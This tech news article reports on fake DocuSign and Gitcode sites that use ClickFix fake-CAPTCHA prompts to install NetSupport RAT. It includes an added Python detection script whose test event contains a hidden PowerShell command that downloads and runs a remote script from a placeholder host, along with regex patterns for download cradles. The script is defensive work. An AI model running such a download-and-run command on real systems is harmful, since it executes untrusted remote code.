Fake DocuSign and Gitcode sites are tricking victims into downloading malware - here's what you need to know

[Image: digital image of a lock. Image credit: Shutterstock]

  • Threat actors are creating fake DocuSign and Gitcode websites
  • The sites come with fake CAPTCHA and other scam mechanisms
  • Victims are tricked into downloading a Trojan

Security researchers have found fake Gitcode and DocuSign websites distributing remote access trojan (RAT) malware using the infamous ClickFix method.

Experts from DomainTools Investigations (DTI) found “malicious multi-stage downloader Powershell scripts” hosted on spoofed websites that invite visitors to open the Windows Run dialog and execute a command the page has already copied into their clipboard.

“Upon doing so, the powershell script downloads another downloader script and executes on the system, which in turn retrieves additional payloads and executes them eventually installing NetSupport RAT on the infected machines,” the researchers said in their report. These multiple stages and downloads are designed to evade detection, and help the campaign “be more resilient to security investigations and takedowns.”

SocGholish

They also said they don’t know exactly how victims end up on these websites. However, it is safe to assume that social engineering, email spam, and possibly malvertising, are part of the methodology. In some cases, the fake websites also present a fake CAPTCHA verification step which, to be “solved”, requires the victim to paste a code into the Run dialog, effectively downloading the malware.
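The defender’s view of the mechanism described above (clipboard-fed command pasted into the Run dialog, which then launches a hidden PowerShell downloader), as an added example that is not from the article or from DomainTools’ report: a small Python scorer over constructed Sysmon-style process-creation records (every path, command line and domain here is invented) that flags a shell spawned directly by explorer.exe, as a Run-dialog launch is, when its command line also hides the window, bypasses execution policy, or carries a download cradle.

```python
import re

# Constructed Sysmon-style process-creation records (not from the article):
# one ClickFix-shaped launch and two benign ones.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/s.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"ParentImage": r"C:\Program Files\Build\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\build\\deploy.ps1"},
]

# Traits of a user-pasted downloader: a shell started by the desktop shell
# (Run dialog / Explorer) whose command line hides the window, lowers the
# execution policy, or pulls and runs remote code.
HIDE_FLAGS = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)
POLICY_FLAGS = re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|invoke-expression|iex|downloadstring|curl|wget)\b", re.I)
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")


def score_event(ev):
    """Return the names of the indicators matched by one process-creation event."""
    image = ev["Image"].lower().rsplit("\\", 1)[-1]
    parent = ev["ParentImage"].lower().rsplit("\\", 1)[-1]
    if image not in SHELLS or parent != "explorer.exe":
        return []
    cmd = ev["CommandLine"]
    hits = ["shell_from_explorer"]
    if HIDE_FLAGS.search(cmd):
        hits.append("hidden_window")
    if POLICY_FLAGS.search(cmd):
        hits.append("policy_bypass")
    if DOWNLOAD_CRADLE.search(cmd):
        hits.append("download_cradle")
    return hits


def find_clickfix_candidates(events, min_hits=3):
    """Flag events combining the explorer parent with at least two suspicious traits."""
    scored = [(i, score_event(ev)) for i, ev in enumerate(events)]
    return [(i, hits) for i, hits in scored if len(hits) >= min_hits]
```

A plain interactive PowerShell opened from the Start menu scores only one hit and is not flagged, which keeps the rule usable on ordinary workstations.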

DTI could not confirm the identity of the attackers, but did stress it had observed a similar campaign late in 2024, which was attributed to SocGholish:

“Notably, the techniques involved are commonplace and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, Storm-0408, and others,” the report concluded.

SocGholish, also known as FakeUpdates, is known for its fake browser and fake software update alerts. After compromising a website, the crooks would inject a popup, notifying the visitors that their browser, or operating system, needs “fixing” or “updating”.

This is the “original” ClickFix method, one that spun off from the ancient “you have a virus” popup that imitated popular antivirus programs and delivered viruses instead.

Via The Hacker News


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
